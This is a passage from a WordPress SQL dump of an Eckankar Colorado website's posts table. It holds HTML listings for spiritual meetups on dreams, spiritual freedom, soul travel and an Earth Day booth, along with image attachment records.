22:57:26','',268255,'https://eckankar-colorado.org/wp-content/uploads/2023/03/colorado-springs-grand-opening.jpg',0,'attachment','image/jpeg',0),(268208,15,'2023-03-17 19:07:25','2023-03-18 01:07:25','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Would you like to learn more about Eckankar?</strong></span><br>\r\n<span style=\"font-size: 14pt;\"><strong>Would you like to attend a fun and holistic educational event?</strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will be hosting an Eckankar booth at the Earth Day celebration in Centennial Park and the River Walk, in downtown Pagosa.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We would love to meet you. We will be giving out free \"<em>Eck Wisdom\"</em>&nbsp;books on topics such as Past Lives, Dreams, and Soul Travel, and our booth will have a Wisdom Wheel that you can spin for a playful way to receive spiritual insights.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Earth Day brings together participants with conscious, holistic, and ecological perspectives to \"Invest in the Earth.\"</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We hope to see you there!</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/292281015/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Spiritual Experiences Group to Attend the Pagosa Springs Earth Day Celebration<br>In Person Event','','publish','closed','closed','','spiritual-experiences-group-to-attend-the-pagosa-springs-earth-day-celebration-in-person-event','','','2023-03-17 19:16:32','2023-03-18 01:16:32','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268208',0,'mec-events','',0),(268209,15,'2023-03-17 19:05:55','2023-03-18 01:05:55','','EarthDay','','inherit','closed','closed','','earthday','','','2023-03-17 19:05:55','2023-03-18 01:05:55','',268208,'https://eckankar-colorado.org/wp-content/uploads/2023/03/EarthDay.webp',0,'attachment','image/webp',0),(268210,15,'2023-03-17 19:13:27','2023-03-18 01:13:27','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">There exist wonderful truths - spiritual laws that nourish us, one and all.</span><br>\r\n<span style=\"font-size: 14pt;\">Laws of wisdom, freedom, and charity, or divine love.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">How can we shape our lives and destiny to live in harmony with them?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">As awakened captains of our destiny, we can meet today\'s challenges in a more relaxed and happy way. The spiritual laws of life give us the many resources to make the very best decision at any one moment.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Do you wish to open the door to the hidden spiritual truths that uplift us all?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Then join us for an open discussion on the spiritual laws of life. Begin working with these laws for a greater ability to live a life with more love, energy, and understanding!</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar, the Path of Spiritual Freedom. People of all faiths and beliefs are welcome.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/pagosa-springs-spiritual-experiences-group/events/292289061/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','The Spiritual Laws of Life: Life Makes Sense When You Know These Laws<br>In Person Discussion','','publish','closed','closed','','the-spiritual-laws-of-life-life-makes-sense-when-you-know-these-lawsin-person-discussion','','','2023-03-17 19:13:27','2023-03-18 01:13:27','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268210',0,'mec-events','',0),(268211,15,'2023-03-17 19:12:01','2023-03-18 01:12:01','','Compass','','inherit','closed','closed','','compass','','','2023-03-17 19:12:01','2023-03-18 01:12:01','',268210,'https://eckankar-colorado.org/wp-content/uploads/2023/03/Compass.webp',0,'attachment','image/webp',0),(268213,15,'2023-03-17 19:43:24','2023-03-18 01:43:24','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Spiritual freedom means to be freed from whatever is causing us problems.</span><br>\r\n<span style=\"font-size: 14pt;\">Are you ready to accept the freedom of a new state of consciousness? And a renewed sense of joy and love for life?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Let go of some of your old ideas of who and what you are.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“Learn to exercise your powers of imagination. First visualize in great detail our world as you would have it. Everything around us today ... is actually the outcome of attitudes we\'ve formed over the centuries. We must form new attitudes if we wish to strike out in a new direction in our spiritual lives.\"</span><br>\r\n<span style=\"font-size: 14pt;\">Harold Klemp - <em>ECK WISDOM on Spiritual Freedom</em> - pg. 33</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Open your wings and prepare for flight!</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Come to share your thoughts, experiences, and questions about \'Spiritual Freedom\' in this open discussion; explore with others who have similar spiritual interests.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This is the first of three free online explorations of ‘Spiritual Freedom’. Each monthly meetup in this series is its own discussion on some facets of ‘Spiritual Freedom’; you have been encouraged to enjoy, and are welcome to attend, any one or any combination of the three sessions.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Booklet:</span><br>\r\n<span style=\"font-size: 14pt;\">\'<em>ECK WISDOM on Spiritual Freedom</em>\', is a booklet which is a ticket to an unexpected destination – the heart of your being. It is available for purchase at the link below.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><a class=\"text-viridian\" href=\"https://www.eckbooks.org/items/-2075-3.html?\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECK WISDOM on Spiritual Freedom</a></span><br>\r\n<span style=\"font-size: 14pt;\">(small booklet, 92 pages)</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Video:</span><br>\r\n<span style=\"font-size: 14pt;\">You may enjoy listening to, watching, and sharing with others this video:</span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"text-viridian\" href=\"https://www.youtube.com/watch?v=nFhbuXCbcFg\" target=\"_blank\" rel=\"noopener ugc\">How to Find Spiritual Freedom</a></span><br>\r\n<span style=\"font-size: 14pt;\">{1:52}</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The next SEGA Meetup will be on Wednesday, May 3rd at 7:00 p.m.</span><br>\r\n<span style=\"font-size: 14pt;\">We will continue our \'Spiritual Freedom\' discussion.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Event Presented by&nbsp;</span><span style=\"font-size: 14pt;\"><a class=\"text-viridian\" href=\"https://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECKANKAR</a></span></p>\r\n<p class=\"mb-4\">&nbsp;</p>\r\n</div>\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofaurora/events/292226013/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Spiritual Freedom Discussion<br>Online','','publish','closed','closed','','spiritual-freedom-discussiononline','','','2023-03-17 21:48:17','2023-03-18 03:48:17','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268213',0,'mec-events','',0),(268215,15,'2023-03-17 19:49:24','2023-03-18 01:49:24','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Spiritual freedom means to be freed from whatever is causing us problems.</span><br>\r\n<span style=\"font-size: 14pt;\">Are you ready to accept the freedom of a new state of consciousness? And a renewed sense of joy and love for life?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Let go of some of your old ideas of who and what you are.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“Learn to exercise your powers of imagination. First visualize in great detail our world as you would have it. Everything around us today ... is actually the outcome of attitudes we\'ve formed over the centuries. We must form new attitudes if we wish to strike out in a new direction in our spiritual lives.\"</span><br>\r\n<span style=\"font-size: 14pt;\">Harold Klemp - <em>ECK WISDOM on Spiritual Freedom</em> - pg. 33</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Open your wings and prepare for flight!</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Come to share your thoughts, experiences, and questions about \'Spiritual Freedom\' in this open discussion; explore with others who have similar spiritual interests.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This is the second of three free online explorations of ‘Spiritual Freedom’. Each monthly meetup in this series is its own discussion on some facets of ‘Spiritual Freedom’; you have been encouraged to enjoy, and are welcome to attend, any one or any combination of the three sessions.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Booklet:</span><br>\r\n<span style=\"font-size: 14pt;\">\'<em>ECK WISDOM on Spiritual Freedom</em>\', is a booklet which is a ticket to an unexpected destination – the heart of your being. It is available for purchase at the link below.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><a class=\"text-viridian\" href=\"https://www.eckbooks.org/items/-2075-3.html?\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECK WISDOM on Spiritual Freedom</a></span><br>\r\n<span style=\"font-size: 14pt;\">(small booklet, 92 pages)</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Video:</span><br>\r\n<span style=\"font-size: 14pt;\">You may enjoy listening to, watching, and sharing with others this video:</span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"text-viridian\" href=\"https://www.youtube.com/watch?v=nFhbuXCbcFg\" target=\"_blank\" rel=\"noopener ugc\">How to Find Spiritual Freedom</a></span><br>\r\n<span style=\"font-size: 14pt;\">{1:52}</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The next SEGA Meetup will be on Wednesday, June 7th at 7:00 p.m.</span><br>\r\n<span style=\"font-size: 14pt;\">We will continue our \'Spiritual Freedom\' discussion.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Event Presented by&nbsp;</span><span style=\"font-size: 14pt;\"><a class=\"text-viridian\" href=\"https://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECKANKAR</a></span></p>\r\n</div>\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofaurora/events/292293424/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Spiritual Freedom Discussion<br>Online','','publish','closed','closed','','spiritual-freedom-discussiononline-2','','','2023-03-17 21:52:00','2023-03-18 03:52:00','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268215',0,'mec-events','',0),(268214,15,'2023-03-17 19:39:24','2023-03-18 01:39:24','','MountainLake','','inherit','closed','closed','','mountainlake','','','2023-03-17 19:39:24','2023-03-18 01:39:24','',268213,'https://eckankar-colorado.org/wp-content/uploads/2023/03/MountainLake.webp',0,'attachment','image/webp',0),(268216,15,'2023-03-17 19:53:32','2023-03-18 01:53:32','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Spiritual freedom means to be freed from whatever is causing us problems.</span><br>\r\n<span style=\"font-size: 14pt;\">Are you ready to accept the freedom of a new state of consciousness? And a renewed sense of joy and love for life?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Let go of some of your old ideas of who and what you are.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“Learn to exercise your powers of imagination. First visualize in great detail our world as you would have it. Everything around us today ... is actually the outcome of attitudes we\'ve formed over the centuries. We must form new attitudes if we wish to strike out in a new direction in our spiritual lives.\"</span><br>\r\n<span style=\"font-size: 14pt;\">Harold Klemp - <em>ECK WISDOM on Spiritual Freedom</em> - pg. 33</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Open your wings and prepare for flight!</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Come to share your thoughts, experiences, and questions about \'Spiritual Freedom\' in this open discussion; explore with others who have similar spiritual interests.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This is the third of three free online explorations of ‘Spiritual Freedom’. Each monthly meetup in this series is its own discussion on some facets of ‘Spiritual Freedom’; you have been encouraged to enjoy, and are welcome to attend, any one or any combination of the three sessions.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Booklet:</span><br>\r\n<span style=\"font-size: 14pt;\">\'<em>ECK WISDOM on Spiritual Freedom</em>\', is a booklet which is a ticket to an unexpected destination – the heart of your being. It is available for purchase at the link below.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><a class=\"text-viridian\" href=\"https://www.eckbooks.org/items/-2075-3.html?\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECK WISDOM on Spiritual Freedom</a></span><br>\r\n<span style=\"font-size: 14pt;\">(small booklet, 92 pages)</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Video:</span><br>\r\n<span style=\"font-size: 14pt;\">You may enjoy listening to, watching, and sharing with others this video:</span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"text-viridian\" href=\"https://www.youtube.com/watch?v=nFhbuXCbcFg\" target=\"_blank\" rel=\"noopener ugc\">How to Find Spiritual Freedom</a></span><br>\r\n<span style=\"font-size: 14pt;\">{1:52}</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Event Presented by&nbsp;</span><span style=\"font-size: 14pt;\"><a class=\"text-viridian\" href=\"https://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECKANKAR</a></span></p>\r\n</div>\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofaurora/events/292293427/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Spiritual Freedom Discussion','','publish','closed','closed','','spiritual-freedom-discussiononline-3','','','2023-06-21 21:18:06','2023-06-22 03:18:06','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268216',0,'mec-events','',0);
INSERT INTO `wpcl_posts` VALUES (268794,2,'2023-07-14 10:58:24','2023-07-14 16:58:24','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<ul class=\"\">\r\n	<li><strong><span style=\"font-size: 14pt;\">What would you like your love story to be?</span></strong></li>\r\n	<li><strong><span style=\"font-size: 14pt;\">What are you passionate about?</span></strong></li>\r\n	<li><strong><span style=\"font-size: 14pt;\">What effect do you as the main character have on your family, friends, co-workers, neighbors?</span></strong></li>\r\n	<li><strong><span style=\"font-size: 14pt;\">What would help you through the ups and downs of your story?</span></strong></li>\r\n</ul>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Harold Klemp, the spiritual leader of ECKANKAR, gives this suggestion:</span></p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px; border-style: solid; border-width: 0px 0px 0px 4px; box-shadow: #cecece 0px 0px 0px 0px inset; padding-bottom: 0em;\">\r\n<p><strong><span style=\"color: #666666; font-size: 14pt;\">“Do one thing each day for love alone. Don’t expect any kind of reward.\"<br>\r\n</span></strong><span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp,&nbsp;<em>Stories to Help You See God In Your Life: The Book of ECK Parables</em>, Vol. 4.</span></p>\r\n</blockquote>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are warmly invited to this open discussion about experiencing your life journey as the greatest love story, whose characters will face all kinds of adventures, hardships, and changes.</span></p>\r\n<p><span style=\"font-size: 14pt;\">As part of our meetup, we will use a brief spiritual exercise to help us.</span><br>\r\n<span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">We will meet via ZOOM again. Please RSVP to get the link.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-lone-tree/events/294785015/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Write the Screenplay of Your Life As a Love Story That Matters','','publish','closed','closed','','write-the-screenplay-of-your-life-as-a-love-story-that-matters','','','2023-07-14 11:55:15','2023-07-14 17:55:15','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268794',0,'mec-events','',0),(268393,0,'2023-04-18 10:44:30','2023-04-18 16:44:30','','','','publish','closed','closed','','268393','','','2023-04-18 10:44:30','2023-04-18 16:44:30','',0,'https://eckankar-colorado.org/nf_sub/268393/',0,'nf_sub','',0),(268394,0,'2023-04-18 10:46:00','2023-04-18 16:46:00','','','','publish','closed','closed','','268394','','','2023-04-18 10:46:00','2023-04-18 16:46:00','',0,'https://eckankar-colorado.org/nf_sub/268394/',0,'nf_sub','',0),(268397,0,'2023-04-20 15:57:26','2023-04-20 21:57:26','','','','publish','closed','closed','','268397','','','2023-04-20 15:57:26','2023-04-20 21:57:26','',0,'https://eckankar-colorado.org/nf_sub/268397/',0,'nf_sub','',0),(268236,2,'2023-03-22 12:54:54','2023-03-22 18:54:54','','Easy Way','','inherit','closed','closed','','easy-way-2','','','2023-03-22 12:54:54','2023-03-22 18:54:54','',45842,'https://eckankar-colorado.org/wp-content/uploads/2023/03/Easy-Way.jpg',0,'attachment','image/jpeg',0),(268243,15,'2023-03-23 22:09:06','2023-03-24 04:09:06','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Would you like help remembering your dreams?</span><br>\r\n<span style=\"font-size: 14pt;\">Are you interested in tools to interpret your dreams?</span><br>\r\n<span style=\"font-size: 14pt;\">Would you like to understand the connections between your dreams and your daily life?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this Meetup is for you. We will discuss ways to remember and interpret your dreams and try a couple techniques to help you understand what is happening in your own inner worlds. Our goal is that each person will gain a deeper understanding of the dream worlds from a spiritual perspective.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The dream worlds are real. When we sleep, Soul (that\'s you!) is free to travel in the spiritual worlds and gain all kinds of experience that can help you in your day-to-day life. </span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says in his book,&nbsp;<em>ECK Wisdom on Dreams</em>, pp. 2-3, “Dreams touch every level of our life. They may let us glimpse the future, or give suggestions for healing, or share insights into our relationships. Above all, they can and will steer us more directly toward God.”</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-grand-junction/events/292411363/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','A Spiritual View of Dreams: Your Source for Everyday Guidance<br>In Person Discussion','','publish','closed','closed','','a-spiritual-view-of-dreams-your-source-for-everyday-guidancein-person-discussion','','','2023-03-23 22:09:06','2023-03-24 04:09:06','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268243',0,'mec-events','',0),(268244,15,'2023-03-23 22:21:46','2023-03-24 04:21:46','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">What if you are actually on a journey - a quest that has spanned ages, continents, lifetimes? You have survived victories, tragedies, wealth and poverty, unimaginable gains and losses. Death and rebirth time and again.</span><br>\r\n<span style=\"font-size: 14pt;\">Join us to explore how to get back on track with your ancient quest for Self-Discovery, God-Discovery and beyond.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Presented by ECKANKAR - The Path of Spiritual Freedom. Look for our booth at the Loveland Body Mind Spirit Expo! Free books on Past Lives, Dreams, and Soul Travel.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The workshop is free of charge. It costs $10 per person to get into the Expo.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-of-loveland/events/292412512/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Past Lives Dreams and Soul Travel Workshop<br>In Person Workshop','','publish','closed','closed','','past-lives-dreams-and-soul-travel-workshopin-person-workshop','','','2023-03-23 22:21:46','2023-03-24 04:21:46','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268244',0,'mec-events','',0),(268245,15,'2023-03-23 22:19:43','2023-03-24 04:19:43','','Pyramid','','inherit','closed','closed','','pyramid','','','2023-03-23 22:19:43','2023-03-24 04:19:43','',268244,'https://eckankar-colorado.org/wp-content/uploads/2023/03/Pyramid.webp',0,'attachment','image/webp',0),(268246,15,'2023-03-23 22:28:16','2023-03-24 04:28:16','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">What does spiritual freedom mean to you?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Would you recognize it if you had it?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Where is your entrance ramp to the road to spiritual freedom?</span></li>\r\n</ul>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp, the spiritual leader of ECKANKAR, writes in <em>ECK Wisdom</em></span><br>\r\n<span style=\"font-size: 14pt;\"><em>on Spiritual Freedom</em>, page 3:&nbsp; </span><span style=\"font-size: 14pt;\">“Spiritual Freedom is living to your full potential—heart, mind, and Soul. What could be more satisfying?”</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to this open discussion about spiritual freedom. We will use a brief spiritual exercise to help us.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will meet via ZOOM again. Please RSVP to get the link.</span></p>\r\n</div>\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/292411423/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Travel Tips on the Road to Spiritual Freedom<br>Online','','publish','closed','closed','','travel-tips-on-the-road-to-spiritual-freedomonline','','','2023-03-23 22:28:16','2023-03-24 04:28:16','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268246',0,'mec-events','',0),(268247,15,'2023-03-23 22:26:06','2023-03-24 04:26:06','','TravelTips','','inherit','closed','closed','','traveltips','','','2023-03-23 22:26:06','2023-03-24 04:26:06','',268246,'https://eckankar-colorado.org/wp-content/uploads/2023/03/TravelTips.webp',0,'attachment','image/webp',0),(268248,15,'2023-03-23 22:31:01','2023-03-24 04:31:01','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\">What does spiritual freedom mean to you?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Would you recognize it if you had it?</span></li>\r\n	<li><span style=\"font-size: 14pt;\">Where is your entrance ramp to the road to spiritual freedom?</span></li>\r\n</ul>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp, the spiritual leader of ECKANKAR, writes in <em>ECK Wisdom</em></span><br>\r\n<span style=\"font-size: 14pt;\"><em>on Spiritual Freedom</em>, page 3:&nbsp; </span><span style=\"font-size: 14pt;\">“Spiritual Freedom is living to your full potential—heart, mind, and Soul. What could be more satisfying?”</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You are warmly invited to this open discussion about spiritual freedom. We will use a brief spiritual exercise to help us.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will meet via ZOOM again. Please RSVP to get the link.</span></p>\r\n</div>\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/292411409/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Travel Tips on the Road to Spiritual Freedom<br>Online','','publish','closed','closed','','travel-tips-on-the-road-to-spiritual-freedomonline-2','','','2023-03-23 22:31:01','2023-03-24 04:31:01','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268248',0,'mec-events','',0),(268411,2,'2023-07-29 10:43:23','2023-07-29 16:43:23','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt;\">A close cousin to dreaming, Soul Travel is a natural ability. It is a shift in awareness, a change in consciousness, moving closer to God.</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 15pt;\">The <strong>Colorado Springs ECK Center</strong> will be live-streaming the upcoming \'ECK Light and Sound Service\' from the ECK Temple of Colorado. The program will be shown on a large TV for all to enjoy. You are warmly invited to join us for this in person event.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Soul Travel: Adventures in Higher Consciousness','','publish','closed','closed','','soul-travel-adventures-in-higher-consciousness','','','2023-07-29 10:45:42','2023-07-29 16:45:42','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=268411',0,'mec-events','',0),(268251,2,'2023-08-31 12:46:21','0000-00-00 00:00:00','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\" style=\"line-height: 32px;\"><span style=\"font-size: 20pt;\"><strong><span class=\"\" style=\"color: #ad7f14;\">Tag Line Goes 